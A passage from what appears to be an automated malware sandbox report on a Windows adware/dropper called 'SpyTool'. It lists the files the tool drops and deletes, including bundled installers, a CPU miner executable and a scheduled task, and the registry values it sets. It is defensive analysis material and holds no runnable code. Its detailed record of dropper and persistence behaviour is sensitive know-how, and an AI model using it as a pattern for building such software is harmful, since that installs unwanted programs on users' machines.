%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\amazon.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\chrome.packed.7z (1312726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\skype.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_translate.ico (1592 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3 (0 bytes)
%WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (0 bytes)
The process nsx36.tmp:1468 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (15 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (0 bytes)
The process encrypt.exe:1060 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (92311 bytes)
The process encrypt.exe:1476 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (24230 bytes)
The process encrypt.exe:1100 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (1447 bytes)
The process encrypt.exe:1584 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (31996 bytes)
The process nsx1C.tmp:1896 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1F.tmp (8776 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (0 bytes)
The process nsx1C.tmp:1088 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso22.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (14 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (0 bytes)
The process nst25.tmp:1804 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj28.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (784 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (0 bytes)
The process nso3D.tmp:3724 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\blowfish.dll (22 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv3F.tmp (0 bytes)
The process nsk6.tmp:204 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw8.tmp (0 bytes)
The process %original file name%.exe:1736 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\policyname[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\vos[1].htm (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso3D.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj32.tmp (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\setup_362[1].exe (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx46.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup_gmsd_re[1].exe (365499 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz16.tmp (0 bytes)
Registry activity
The process upgmsd_re_005010096.exe:1276 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "F855B05B-E99A-467D-A5E5-45A5C22EF132"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 B4 06 0A 8D 74 E3 01 4A AE E9 9B 9A 3E 79 A4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
